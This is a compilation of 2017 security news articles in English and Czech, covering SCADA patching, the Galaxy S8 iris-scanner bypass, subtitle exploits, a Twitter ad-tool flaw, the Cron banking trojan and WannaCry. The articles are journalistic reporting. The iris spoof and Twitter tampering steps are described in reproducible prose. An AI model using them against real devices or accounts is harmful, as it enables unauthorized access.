Average time it takes to release patches for SCADA products

Compared to other industries, SCADA vendors are roughly at the same level as cybersecurity firms when it comes to how fast they patch vulnerabilities. Vendors of popular software, such as Microsoft, Apple, Oracle and Adobe, have a response time of under 120 days, while business software developers are significantly slower, with an average of 189 days.

Trend Micro’s report includes case studies for each type of vulnerability affecting SCADA systems. The case study for memory corruption vulnerabilities describes a buffer overflow in Advantech’s WebAccess HMI, which could have been exploited to execute arbitrary code with elevated privileges.

As for credential management issues, which include hardcoded passwords and insufficiently protected credentials, the security firm shared an analysis of the MDS PulseNET product from General Electric (GE).

The case studies also cover code injections in Cogent DataHub, and authentication and authorization-related flaws in Advantech WebAccess and Siemens SINEMA Server.

The complete report, titled “Hacker Machine Interface - The State of SCADA HMI Vulnerabilities,” is available for download in PDF format.

Hackers Defeat Samsung Galaxy S8 Iris Scanner

24.5.2017 securityweek Mobil
Hackers of the Chaos Computer Club (CCC) in Germany have managed to defeat the iris recognition system on Samsung’s flagship Galaxy S8 smartphones.

The Samsung Galaxy S8 has several biometrics-based authentication systems, including face recognition, a fingerprint scanner, and an iris scanner. The iris authentication, which allows users to unlock their device and authorize payments, is advertised by Samsung as “one of the safest ways to keep your phone locked.”

While an individual’s iris is unique, researchers from CCC showed that Samsung’s iris scanner can be defeated by showing it a picture of the victim’s eye. It’s worth noting that members of the CCC were the first to bypass Apple’s fingerprint-based Touch ID system after its introduction in 2013.

Experts say there are several ways to obtain iris data, including from high-resolution pictures posted by users themselves on the Internet. Another method is to take a picture of the targeted individual’s eye using a digital camera with night-shot mode or the infrared filter disabled.

Researchers demonstrated that a camera with a 200mm lens can capture a usable picture of the iris from up to five meters (16 feet).

“In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable,” the CCC said. “Depending on the picture quality, brightness and contrast might need to be adjusted.”

Once the picture of the iris has been obtained, it can be printed out using a laser printer – the best results were, ironically, obtained on a Samsung printer. The last step is to place a contact lens on top of the print to mimic the curvature of a real eye. Placing the photo in front of the Galaxy S8’s iris scanner successfully unlocks the device.
SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

This is not the first time someone has targeted the biometrics features of the Samsung Galaxy S8. It was demonstrated a few weeks ago that the smartphone’s face recognition system can be bypassed simply by showing it a picture of the targeted user’s face.

The CCC said that if rumors turn out to be true and the next iPhone generation will have an iris scanner, they will try to defeat that one as well.

Biometrics are increasingly popular, especially in the financial industry. Banks are now allowing customers to use selfies, their voice and their fingerprints for authentication and authorization.

While biometric authentication is often advertised as highly secure, there are ways to defeat it. A BBC reporter demonstrated recently that his non-identical twin brother could access his HSBC account by fooling the bank’s voice ID authentication service.

Flashpoint Enhances Risk Intelligence Platform

24.5.2017 securityweek Security
Just as global intelligence firm Stratfor extracts and presents geopolitical intelligence from the noise of available information, so now does Flashpoint extract cyber business risk intelligence (BRI) from the noise of deep and dark web conversations.

Flashpoint is not new to BRI. It raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence. "Looking beyond cyber threat Intelligence, BRI ultimately informs decision-making, improves preparation, and mitigates risk throughout an entire organization," said Flashpoint at the time.

That process has now come to fruition with today's launch of the Flashpoint Intelligence Platform 3.0. It aims to convert and present the raw intelligence gleaned from the deep and dark web as actionable business risk intelligence that will help customers take a more strategic role in security planning.

Most threat intelligence ultimately comes from the deep and dark web. This is where cyber criminals share information, trade malware and boast about exploits. But access is difficult. The deepest and darkest areas are well-protected, and only accessible to 'approved' people. Flashpoint has a team of expert analysts, often with 3-letter agency backgrounds, who spend the time and effort necessary to get into the darkest corners.

This is where Flashpoint gleans its threat intelligence. It comes from actual dialogue between threat actors; from black market products and services; from where malicious tactics, techniques and procedures (TTPs) are discussed; and where weapons and training manuals are shared.

But threat intelligence falls short of business risk intelligence. "Some threat intelligence solutions can be no different than URL filtering, merely contributing to the greater noise," warns Gartner Research VP, Greg Young. "Instead, good threat intelligence solutions are customized and able to deliver a high-confidence alert to initiate an actionable response. Peering out at what often looks like a world of shadows and hostility, security teams can see specificity as a key to the achievement of their best success with limited resources."

For most organizations, access to any threat intelligence comes from surface web reports produced by different security vendors. These often discuss individual threats discovered by individual vendors, often focusing on their own product sphere. While these are valuable, they present a piecemeal view of the overall threat landscape.

In this sense, Flashpoint is vendor-neutral: it provides intelligence rather than product. Its new development is to generate and present actual risk intelligence from the raw threat intelligence. But its team of analysts don't just gather intelligence from the dark web, it converts it through analysis reports into business actionable information -- in short, it adds context that goes beyond cyber.

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

The Intelligence Platform 3.0 provides access to Flashpoint's analyses with a finished intelligence experience. Users can use it to search Flashpoint's reports, focusing on specific areas of interest and including both cybercrime intelligence and physical threat intelligence -- or they can pivot directly into a sanitized sandbox of the original threat actor data. The result helps the security team understand the overall threat landscape, and provides the materials necessary to translate threats into business risks consumable by senior management.

CEOs and Coffee Shops Are Mobile Computing's Biggest Risks: Report

24.5.2017 securityweek Mobil
The balance between encouraging mobility for business purposes and controlling it for security remains as tricky today as ever. Ninety-three percent of organizations are now somewhat or very concerned that the mobile workforce is presenting an increasing number of security challenges. Of these, 47% are 'very concerned'; a figure that has grown from 36% a year ago.

These figures come from the iPass 2017 Mobile Security Report (PDF), published today. iPass is a global provider of always-on, secure Wi-Fi; with more than 60 million hotspots in more than 120 countries.

Vanson Bourne surveyed 500 CIOs and senior IT decision makers from the US (200), UK (100), Germany (100) and France (100). While the results are broadly consistent across all regions, there are nevertheless some surprising differences. For example, while there is acknowledgement that security is needed, there is apparent recognition that control is difficult -- and the extent of the problem and ways to solve it differ by geographic region.

Less than a third of companies ban the use of public Wi-Fi at all times, while a further 37% ban their use 'sometimes'. More surprising, however, is the regional difference: 44% of UK organizations do not, and do not plan to introduce a ban; but only 10% of US companies are similar. Eight percent of UK companies have no concern over mobile security, while only 1% of US companies have no concerns.

Coffee shops are unsurprisingly a major cause of concern. "Wherever there is an unsecured public Wi-Fi network," notes the report, "there is the threat of attack. However, coffee shops are seen as the most dangerous public Wi-Fi venue of all." In all regions surveyed, 42% of respondents cited coffee shops as their major concern over public wi-Fi. "Cafes and coffee shops are everywhere and offer both convenience and comfort for mobile workers, who flock to these venues for the free high speed internet as much as for the coffee," comments Raghu Konka, vice president of engineering at iPass. "However, cafes invariably have lax security standards, meaning that anyone using these networks will be potentially vulnerable."

Cafes are followed by airports (30%) and hotels (16%) as the locations giving most concern over public Wi-Fi.

Man-in-the-middle (MitM) attacks are considered the greatest threat, cited by 69% of respondents. This is followed by lack of encryption (63%), hotspot spoofing (58%), and unpatched devices (55%).

The greatest risk, however, comes not from mid-level or even junior staff -- it is the CEO and other C-level executives. "The grim reality," explains Konka, "is that C-level executives are by far at the greatest risk of being hacked outside of the office. They are not your typical 9-5 office worker. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker."

The respondents agreed. Overall, 40% of respondents named the C-Suite. It was as low as 29% in the UK (possibly because there are fewer C-level executives), and as high as 49% in Germany. It was 40% in the US. Senior management came in as presenting the second most serious threat, at 34% overall. Not surprisingly, it was higher in the UK at 42%; and lower in the US at 26%.

The simple reality is that mobile working is an essential part of modern business despite security concerns about it. In many cases, the survey suggests that total bans on public Wi-Fi are increasingly adopted. "Sadly, in response to this growing threat, the majority of organizations are choosing to ban first and think later," comments Konka. "They ignore the fact that, in an increasingly mobile world, there are actually far more opportunities than threats. Rather than give in to security threats and enforce bans that can be detrimental or even unenforceable, businesses must instead ensure that their mobile workers have the tools to get online and work securely at all times."

Media Players Expose Millions of Systems to Subtitle Attacks

24.5.2017 securityweek Hacking
Malicious actors could hijack millions of systems using specially crafted subtitle files that exploit vulnerabilities in some of the most popular media players, security firm Check Point warned on Tuesday.

According to experts, attackers can take complete control of a device simply by getting the targeted user to open a malicious subtitle file in one of the vulnerable media players. In the case of applications that automatically obtain subtitles from the Internet, it may be possible to conduct attacks without any user interaction.

Check Point’s analysis has focused on four popular media players, but researchers believe other applications are likely affected as well. The players confirmed to be vulnerable are VLC, the open-source home theater software Kodi (formerly known as XBMC), the video streaming app Stremio, and Popcorn Time, which streams movies and TV shows directly from torrents.

Experts pointed out that the potential number of victims for these subtitle attacks is very high considering that the latest version of VLC has been downloaded 170 million times, and Kodi reportedly has nearly 40 million unique users each month.

The developers of these media players have released patches, but some issues are still under investigation and Check Point has decided not to make public any technical details.

According to the security firm, hackers can use specially crafted subtitle files to execute arbitrary code, which can allow them to take complete control of the system.

“The attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,” Check Point’s research team said in a blog post. “The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.”

A video published by Check Point shows how the attack works:

While in some cases the targeted user needs to be convinced to open the malicious file with an affected player, researchers warned that attackers could also manipulate the ranking algorithm of subtitle websites to ensure that applications designed to automatically load subtitles would pick their file. By ensuring that their subtitle has a high ranking, attackers also increase the chances of users manually loading the malicious files.

New Product Allows Easy Addition of Multi-Factor Authentication to Any Application

24.5.2017 securityweek Safety
New Multi-factor Authentication Offering Seeks Balance Between Strong Security and Ease of Use

The correct balance between strong security and excessive control is difficult. Without strong security, such as multi-factor authentication (MFA), organizations will be breached. With excessive control (such as MFA always and everywhere), business will be impeded, employees will be disgruntled, and controls will be bypassed. A new behavioral authentication product announced today by security firm Preempt allows optional MFA, based on user behavior, on any application.

Preempt's new "Any App" offering seeks to solve the growing concern over the insider threat by allowing policy to dictate whether user access to any application should be challenged by multi-factor authentication requirements, or simply allowed. This increases security without increasing unnecessary impediment to business.

The insider threat is insidious. It can come from innocent users, 'malicious' users motivated by curiosity or worse, or hackers inside the network with stolen credentials. While modern network analytics can detect 'unusual' behavior, they cannot automatically distinguish between simple unusual and malicious unusual. The result is a large number of alerts that need to be investigated but are often false positives.

Preempt's Any App takes a different approach by imposing strong security in the form of multi-factor authentication requirements on any specified application whenever -- but only if -- 'unusual' user behavior is detected. This is an advance on the more usual and common approach of applying MFA to web applications only.

"Security teams want to better protect their organization and application from threats and breaches by adding policies that require users to validate their identity via authentication techniques before accessing corporate applications," explains Ajit Sancheti, co-founder and CEO of Preempt. But while adding MFA to web applications is relatively simple, protecting on-premises applications is more complex. Integrating secure authentication into each application requires significant resources, which typically leads to the majority of internal applications not being protected by MFA.

Any App, he continues, "removes the need for application customization, and turns the task of adding MFA support to applications into a simple matter of defining policy, which saves both time and money, while also protecting the organization from security breaches."

Any App works at the network layer for both Windows and Linux environments, and acts as an LDAP or Kerberos proxy. When a user first seeks access to an application, the application will attempt to verify the user. Any App proxies this request, and based on security policy can either allow access or require MFA.

If policy requires additional authentication, the organization's MFA solution is automatically triggered. Since Any App is vendor neutral, the MFA can come from the existing deployment of a range of vendors such as Duo, OKTA, and SecureAuth.

The behavioral policy engine within Any App allows the security team to define the conditions necessary to invoke MFA. For example, if the access request comes from an unmanaged device, or if the user is connecting to a new asset or from a new location or new device. This allows the security team to automatically apply more stringent controls without requiring individual alert analysis.

Any App attempts to allow the security team to define and control the balance between strong security and ease of use. It reduces the cost of strong security while activating it only where policy decides it is necessary.

Twitter Bug Allowed Publishing Tweets From Any Account

24.5.2017 securityweek Social
A bug in the Twitter social network allowed an attacker to post tweets as a different user, without having access to the victim’s account.

Discovered by a security researcher going by the name of kedrisec, the issue was reported to Twitter on February 26 and was resolved two days later. The vulnerability was assessed High severity and the reporter received a $7,560 bounty for it.

The issue resided in the handling of Twitter Ads Studio requests, Twitter explains: “By sharing media with a victim user and then modifying the post request with the victim's account ID the media in question would be posted from the victim's account.”

No evidence of the flaw being exploited in the wild has been found so far, with the reporter being the only one to have leveraged the vulnerability, Twitter says.

In their write-up, the researcher explains that the issue leverages Twitter’s ads service, which “has media-library with the possibility to upload media-files (video, pictures, GIF-animation).” The service also offers the option to review media-files uploaded before and which were used when a tweet was published.

The library is located at https://ads.twitter.com/accounts/*id_of_user_account*/media and allows the user not only to view the media file, but also to tweet the file or share it with other users. The function for tweeting has access to account_id, owner_id (image owner), user_id (the user the tweet will be published to), and media_key (id of the media-file that is being published).

Attempting to replace the owner_id and user_id in intercepted GET request and JSON or in POST returned errors. The POST error, however, revealed that the service doesn’t accept the user with the replaced owner_id as the owner of the media file.

The researcher then attempted to modify not only owner_id and user_id, but media_key in POST as well, which resulted in a successful attempt of tweet publication. While this allowed the researcher to publish as any user, it did show a limitation: they could publish only if the user had media-files uploaded and also had to know the media_key of the file, which is almost impossible to get, as it contains 18 digits.

However, if the attacker shared a media-file with the targeted user (meaning the attacker already knows the media_key), the service would consider the victim being the owner of the file, thus allowing the attacker to successfully impersonate the victim when tweeting.

In short, the attack would include the following steps: uploading a file, sharing the file with the targeted user, intercept the query for tweet publication and change in POST the owner_id and user_id (the media_key, which is already known to the attack, doesn’t change).

Beware! Subtitle Files Can Hack Your Computer While You're Enjoying Movies
24.5.2017 thehackernews Hacking
Do you watch movies with subtitles?
Just last night, I wanted to watch a French movie, so I searched for English subtitles and downloaded it to my computer.
Though that film was excellent, this morning a new research from Checkpoint scared me.
I was unaware that a little subtitle file could hand over full control of my computer to hackers, while I was enjoying the movie.
Yes, you heard that right.
A team of researchers at Check Point has discovered vulnerabilities in four of the most popular media player applications, which can be exploited by hackers to hijack "any type of device via vulnerabilities; whether it is a PC, a smart TV, or a mobile device" with malicious codes inserted into the subtitle files.
"We have now discovered malicious subtitles could be created and delivered to millions of devices automatically, bypassing security software and giving the attacker full control of the infected device and the data it holds," he added.
These four vulnerable media players (mentioned below) have been downloaded more than 220 million times:
VLC — Popular VideoLAN Media Player
Kodi (XBMC) — Open-Source Media Software
Popcorn Time — Software to watch Movies and TV shows instantly
Stremio — Video Streaming App for Videos, Movies, TV series and TV channels
The vulnerabilities reside in the way various media players process subtitle files and if exploited successfully, could put hundreds of millions of users at risk of getting hacked.
As soon as the media player parses those malicious subtitle files before displaying the actual subtitles on your screen, the hackers are granted full control of your computer or Smart TV on which you ran those files.
Proof-of-Concept Video

In the above video, the researchers demonstrated that how a maliciously crafted subtitle file for a movie added to Popcorn Time media player can hijack a Windows PC. On the right-hand side of the screen, an attacker, running Kali Linux, gained the remote access of the system as soon as the victim added the subtitle file.
Since text-based subtitles for movies and TV shows are created by writers and then uploaded to Internet stores, like OpenSubtitles and SubDB, hackers could also craft malicious text files for same TV shows and movies.
"Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction," CheckPoint researchers said.

The researchers believe that similar security vulnerabilities also exist in other streaming media players.
How to Protect Your Computer from Hackers?
Check Point has already informed the developers of VLC, Kodi, Popcorn Time and Stremio applications about the recently discovered vulnerabilities.
"To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point," the researchers said.
All of them have patched the flaws, with Stremio and VLC releasing the patched versions of their software: Stremi 4.0 and VLC 2.2.5 that has been out for two weeks.
However, Kodi developer Martijn Kaijser said the official version 17.2 release would arrive later this week, while users could get a fixed version online. A patch for Popcorn Time is also available online.
So, users are advised to update their media player as soon as possible.

Cyber Crime Gang Arrested for Infecting Over 1 Million Phones with Banking Trojan
24.5.2017 thehackernews Virus
The Russian Interior Ministry announced on Monday the arrest of 20 individuals from a major cybercriminal gang that had stolen nearly $900,000 from bank accounts after infecting over one million Android smartphones with a mobile Trojan called "CronBot."
Russian Interior Ministry representative Rina Wolf said the arrests were part of a joint effort with Russian IT security firm Group-IB that assisted the massive investigation.
The collaboration resulted in the arrest of 16 members of the Cron group in November 2016, while the last active members were apprehended in April 2017, all living in the Russian regions of Ivanovo, Moscow, Rostov, Chelyabinsk, and Yaroslavl and the Republic of Mari El.
Targeted Over 1 Million Phones — How They Did It?

Group-IB first learned of the Cron malware gang in March 2015, when the criminal gang was distributing the Cron Bot malware disguised as Viber and Google Play apps.
The Cron malware gang abused the popularity of SMS-banking services and distributed the malware onto victims' Android devices by setting up apps designed to mimic banks' official apps.
The gang even inserted the malware into fake mobile apps for popular pornography websites, such as PornHub.
Once victims downloaded and installed these fake apps on their devices, the apps added itself to the auto-start and the malware hidden inside them granted the hackers the ability to phish victims’ banking credentials and intercept SMS messages containing confirmation codes sent by the bank to verify the transactions.
"After installation, the program added itself to the auto-start and could send SMS messages to the phone numbers indicated by the criminals, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank," writes Group-IB.
"The approach was rather simple: after a victim’s phone got infected, the Trojan could automatically transfer money from the user’s bank account to accounts controlled by the intruders. To successfully withdraw stolen money, the hackers opened more than 6 thousand bank accounts."
The gang usually sent text messages to the banks initiating a transfer of up to $120 to one of their 6,000 bank accounts the group set up to receive the fraudulent payments.
The malware would then intercept the two-step verification codes sent by the bank to confirm the transaction and block the victims from receiving a message notifying them about the transaction.
Cyberthieves Stole $900,000 in the Russia Alone

On April 1, 2016, the gang advertised its Android banking Trojan, dubbed "Cron Bot," on a Russian-speaking forum, giving the Group-IB researchers and Russian authorities a clue to their investigation into the group's operation.
According to the security firm, the group stole approximately 8,000 Rubles (nearly $100) from a victim on an average, fetching a total amount of 50 Million Rubles (almost $900,000) from more than one million victims, with 3,500 unique Android devices infected per day.
After targeting customers of the Bank in Russia, where they were living in, the Cron gang planned to expand its operation by targeting customers of banks in various countries, including the US, the UK, Germany, France, Turkey, Singapore, and Australia.
In June 2016, the gang rented a piece of malware called "Tiny.z" for $2,000 per month, designed to attack customers of Russian banks as well as international banks in Britain, Germany, France, the United States and Turkey, among other countries.
Despite operating only in Russia before their arrest, the gang members had already developed web injections for several of French banks including Credit Agricole, Assurance Banque, BNP Paribas, Banque Populaire, Boursorama, Caisse d'Epargne, Societe Generale and LCL, Group-IB said.
However, before the gang could launch attacks on French banks, the authorities managed to disrupt their operations by making several arrests, including the gang's founder, a 30-year-old resident of Ivanovo, Moscow.
During the raids, the authorities seized computer equipments, bank cards, and SIM cards associated with the criminal gang.

Police dismantled the Cron gang that targeted Bank Accounts via Android Malware
24.5.2017 securityaffairs Android

Russian authorities with the support of the security firm Group-IB dismantled the operations of the Cron gang that infected more than 1 million smartphones.
Russian authorities dismantled a major criminal ring that was targeting bank accounts by using an Android malware, dubbed ‘Cron,’ that compromised more than one million Android smartphones.

According to the Russian Interior Ministry, the criminal organization had stolen nearly $900,000 from bank accounts.

Law enforcement, assisted by the cyber security firm Group-IB have identified 25 members of the organization led by a 30-year-old living in the city of Ivanovo.

16 members of the gang were detained in November 2016, while the last active member was arrested in April.

The Cron Trojan was first spotted in March 2015, when the crime gang had been distributing the malware disguised as Viber and Google Play apps.

Early 2016, investigators discovered that an Android banking Trojan dubbed ‘Cron Bot’ was offered for rent in the criminal underground. According to the experts from the IBM X-Force the Cron Bot had been leased for between $4,000 and $7,000, depending on the configuration chosen by the buyer.

Cron gang malware

The Cron gang used spam SMS messages to spread the malware to individuals in Russia, the attackers used a very effective social engineering technique. The SMS messages informed recipients that their ads or photos had been shared on a website, and included links to a site that tricked victims into downloading and executing the malicious code.

“Spam SMS messages with a link to a website infected with the banking Trojan. The message was of the following form: “Your ad is posted on the website ….”, or “your photos are posted here.” After the user visits the compromised website, the malware will be downloaded on the device, tricking the victim to install it.” reads the report published by Group-IB.

“The victim could install the malicious program on the phone by downloading fake applications masked as legitimate ones. The Trojan is distributed under the guise of such applications as Navitel; Framaroot; Pornhub; Avito.“

Once the Cron Trojan infected a device, the malware could send SMS messages to any phone number, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank. Using the features the malware can intercept 2FA messages sent to the users to authorize fraudulent transactions conducted by crooks.

The Cron gang earned approximately $900 000 USD (50 million rubles) with its activity.

“Every day Cron malware attempted to steal money from 50-60 clients of different banks. An average theft was about 8,000 rubles ($100). According to crime investigators, the total damage from Cron’s activity amounted to approximately $800 000 USD (50 million rubles). ” continues the report.

The investigators discovered the Cron Gang decided to extend its activity to other countries, they rented the Tiny.z banking Trojan for $2,000 per month.

Experts speculate the hackers had been planning on targeting France banking users because the Cron gang developed web injections for several of French banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d’Epargne, Societe Generale and LCL.

Hackers demonstrated that it is too easy to bypass the Samsung S8 iris scanner.
24.5.2017 securityaffairs Hacking

Hackers demonstrated that it is very easy to bypass the Samsung S8 iris scanner by using a camera, a printer, and a contact lens.
Security experts have once against bypassed mobile Biometric system installed on a mobile device, the Samsung S8 model.

Hackers used a camera, a printer and a contact lens to bypass the iris scanner installed on the Samsung S8.

Some smartphones use facial recognition technology for user authentication, researchers from the Chaos Computer Club (CCC) demonstrated that is possible to easily bypass the scanner’s protections and unlock the device.

“We’ve had iris scanners that could be bypassed using a simple print-out,” Linus Neumann, one of the experts who devised the hacking technique, told Motherboard in a Twitter direct message.

“The Samsung Galaxy S8 is the first flagship smartphone with iris recognition. The manufacturer of the biometric solution is the company Princeton Identity Inc. The system promises secure individual user authentication by using the unique pattern of the human iris.” reads the post published by the Chaos Computer Clubs.

“A new test conducted by CCC hackers shows that this promise cannot be kept: With a simple to make dummy-eye the phone can be fooled into believing that it sees the eye of the legitimate owner.

The researchers emulate the thief capturing iris pictures with a digital camera in night-shot mode or the infrared filter removed. Then, to give the image some depth, the experts placed a contact lens on top of the printed picture.

“The easiest way for a thief to capture iris pictures is with a digital camera in night-shot mode or the infrared filter removed. In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable.” continues the post. “Starbug was able to demonstrate that a good digital camera with 200mm-lens at a distance of up to five meters is sufficient to capture suitably good pictures to fool iris recognition systems.”

The researchers explained that they quickly found the way to devise the facial recognition system implemented by Samsung, in just one day of experiments that bypassed it.

“About a day of experimenting until the idea came up do use a contact lens. Then, a little charade of printers until it turned out that the Samsung printer provided the most reliable prints,” Neumann told Motherboard.

Samsung S8 home-screen-840x473.jpg

This isn’t the first time experts at CCC bypassed biometric locks for smartphones, the first proof of concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 to hack an iPhone 5s, in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass Fingerprint biometrics using only a few photographs.

In March YouTube vlogger iDeviceHelp posted a video on his channel, in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus getting the device owner’s picture from Facebook and presenting the image to the locked phone.

Ler’s wait for the Samsung reply.

Statisíce počítačů jsou stále zavirované. Napravit to má WannaKey

23.5.2017 Novinky/Bezpečnost Viry
Šíření škodlivého kódu WannaCry se sice podařilo zastavit, tento nezvaný návštěvník však přesto zvládnul za pouhých pár hodin nakazit na 300 000 počítačů v různých koutech světa. A drtivá z nich bohužel zůstává stále uzamčena. Bezpečnostní experti se to nyní budou snažit napravit pomocí nástroje zvaného WannaKey.
WannaCry – první i vylepšená druhá generace – útočí úplně stejně jako ostatní vyděračské viry, které jsou označovány souhrnným názvem ransomware. Nejprve tedy škodlivý kód pronikne do počítače, pak jej uzamkne a zašifruje všechna data. Za jejich zpřístupnění následně počítačoví piráti požadují výkupné.

Je však nutné zdůraznit, že ani po zaplacení výkupného uživatelé nemají jistotu, že se k datům dostanou.

A právě to teď dělá vrásky na čele statisícům uživatelů, které kybernetická infekce zvaná WannaCry postihla. Operační systém sice mohou přeinstalovat, aby bylo možné počítač zase používat, ke svým datům se ale jednoduše nedostanou.

Na dešifrovacím nástroji se již pracuje
Všem postiženým však nyní svitla naděje díky bezpečnostní společnosti QuarksLab. Ta údajně již testuje nástroj, který dokáže šifrování škodlivého kódu WannaCry obejít a data opět zpřístupnit.

Kybernetický expert Adrien Guinet, který pracuje právě pro QuarksLab, totiž objevil klíč, který je k dešifrování potřebný. A s jeho pomocí nyní finalizuje nástroj zvaný WannaKey, který uzamčené počítače odemkne. A to i bez placení výkupného.

Prací na dešifrovacím nástroji se pochlubili i další bezpečnostní výzkumníci, kteří působí ve Francii. Je tedy velmi pravděpodobné, že by se uživatelé skutečně mohli v brzké době dočkat aplikace, díky které již WannaCry nebude představovat noční můru.

Nejvíce postiženo Rusko
WannaCry se začal internetem šířit v polovině května. Za pouhých pár hodin stihl nakazit více než 300 000 počítačů ve více než 150 zemích světa. Takřka polovina všech zachycených detekcí (45,07 %) připadá na Rusko. Je to dáno tím, že především v tamních chudých lokalitách ještě uživatelé hojně používají zastaralý operační systém Windows XP, který byl proti škodlivému kódu WannaCry nejvíce zranitelný.

Druhou a třetí příčku pak zaujaly Ukrajina (11,88 %) a Tchaj-wan (11,55 %). Ostatní státy, které se dostaly v žebříčku nejpostiženějších zemí do první desítky, měly podíl tak v řádech jednotek procent. Šlo například o Egypt, Indii či Filipíny.

Česká republika skončila v přehledu s podílem 0,15 % až na 52. místě. Sluší se nicméně podotknout, že spodní příčky měly velmi podobný podíl až prakticky do konce žebříčku, který obsahovat 150 států. Například sousední Slovensko však na tom bylo hůře – virus WannaCry tam měl podíl 0,26 %.

V Česku byly přitom infikovány stovky strojů. „Podle našich údajů počet infekcí překonal číslovku 620,“ uvedl již dříve na dotaz Novinek Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ.

Pozor na mobily - ransomware totiž nachází nový a snadný cíl

23.5.2017 SecurityWorld Viry
Objem mobilního ransomwaru se v prvním čtvrtletí letošního roku více než ztrojnásobil. Malware tohoto typu přitom chytře využívá získání administrátorských práv v zařízení.

Podle dat reportu „Malware v prvním čtvrtletí 2017“ společnosti Kaspersky Lab vyděračský malware nepolevuje ve svých aktivitách. Množství detekovaných souborů mobilního ransomwaru vystoupalo za první čtvrtletí 2017 na číslo 218 625, přičemž 86 % z nich má na svědomí ransomwarová rodina Congur.

V posledním čtvrtletí loňského roku byl pro porovnání mobilní ransomware detekován pouze v 61 832 případech. Během prvních tří měsíců tohoto roku se také objevilo 55 679 nových modifikací ransomwaru cílících na všechna zařízení, systémy a sítě, za nimiž stálo 11 nových šifrovacích rodin.

Primárním cílem ransomwarové rodiny Congur je zabránit uživateli v přístupu do zařízení. Přenastavením nebo obnovením jeho PIN (hesla) k němu získává administrátorská práva. Některé varianty malwaru navíc tato práva zneužívají k nainstalování svých modulů do systémové složky, odkud je téměř nemožné je odstranit.

Navzdory oblibě rodiny Congur zůstal Trojan-Ransom.AndroidOS.Fusob.h nejrozšířenějším mobilním ransomwarem. Byl odpovědný za 45 % útoků tohoto typu v prvním čtvrtletí 2017.

Hned po svém spuštění vyžaduje tento trojan administrátorská oprávnění a zároveň sbírá informace o zařízení včetně GPS lokace a historie hovorů. Tato data poté nahraje na podvodný server. Ten na základě obdržených informací může vydat příkaz k zablokování zařízení.

Zemí s nejvyšším počtem napadených zařízení mobilním ransomwarem se v prvním čtvrtletí tohoto roku staly Spojené státy. Nejrozšířenější hrozbou zde byl ransomware Svpeng.

Za uplynulé čtvrtletí se téměř dvojnásobně zvýšil počet nově detekovaných ransomwarových modifikací zaměřených na Windows. Od ledna do března 2017 jich bylo detekováno 55 679, přičemž za období říjen až prosinec loňského roku 29 450. Za většinu těchto nových modifikací je zodpovědná rodina Cerber.

Další data reportu firmy Kaspersky Lab:

Webové antivirové nástroje odhalily 79 209 775 unikátních škodlivých adres URL.
Snahy kyberzločinců ukrást peníze prostřednictvím malwarové infekce online bankovnictví byly zaregistrovány na 288 000 uživatelských počítačích.
Útoky šifrujícím ransomwarem byly zablokovány na 240 799 počítačích.
Antivirus Kaspersky Lab celkově detekoval 174 989 956 unikátních škodlivých a potenciálně nevyžádaných objektů.

Jak předejít globálním malwarovým atakům jako WannaCry?

23.5.2017 SecurityWorld Viry
K nedávnému útoku malwaru WannaCry, který paralyzoval nemocnice, vládní organizace, ale i jednotlivé uživatele na celém světě, vůbec nemuselo dojít. Nešlo totiž o žádný technologický zázrak zkonstruovaný a rozšířený geniálním hackerem.

Jeho autoři využili pouze laxnosti bezpečnostních opatření napříč uživateli i organizacemi, a také plíživě rozkladného vlivu, jaký Národní bezpečnostní agentury (NSA) a mnozí technologičtí giganti na globální internetovou bezpečnost mají.

Ve skutečnosti je to ale vlastně dobrá zpráva, jelikož znamená, že zamezit příštímu podobnému útoku nemusí být nemožné. Tady je pět kroků, které tomu mohou napomoci:

1) Zatrhnout NSA skladování bezpečnostních chyb

Útok byl postaven na hackerském nástroji vymyšleném NSA a následně ukradeném a veřejně zveřejněném skupinou říkající si Shadow Brokers. Jak poznamenal New York Times, šlo zřejmě o první útok „kyberzbraní vyvinutou v NSA, placenou penězi daňových poplatníků“, proti kterým byla následně zneužita.

Běžnou praxí NSA je nalézání chyb v operačních systémech a programování nástrojů pro jejich zneužití, dost často bez toho, aniž by tento postup koordinovala s výrobcem.

K částečné spolupráci s výrobci přiměla NSA administrativa bývalého prezidenta Barracka Obamy a agentura se tak o část odhalených děr podělila, útok WannaCry však cílil přes kritické body, které si NSA nechala pro sebe.

Od Microsoftu za to proto schytala kritiku, softwarový gigant navíc apeloval na vlády, ať ve věci kyberzločinu přijmou zcela nová opatření, jejichž součástí by byla i součinnost vládních agentur s výrobci softwaru.

2) Žádat po výrobcích, ať bezpečnostní patche distribuují mezi všechny, nejen platící zákazníky

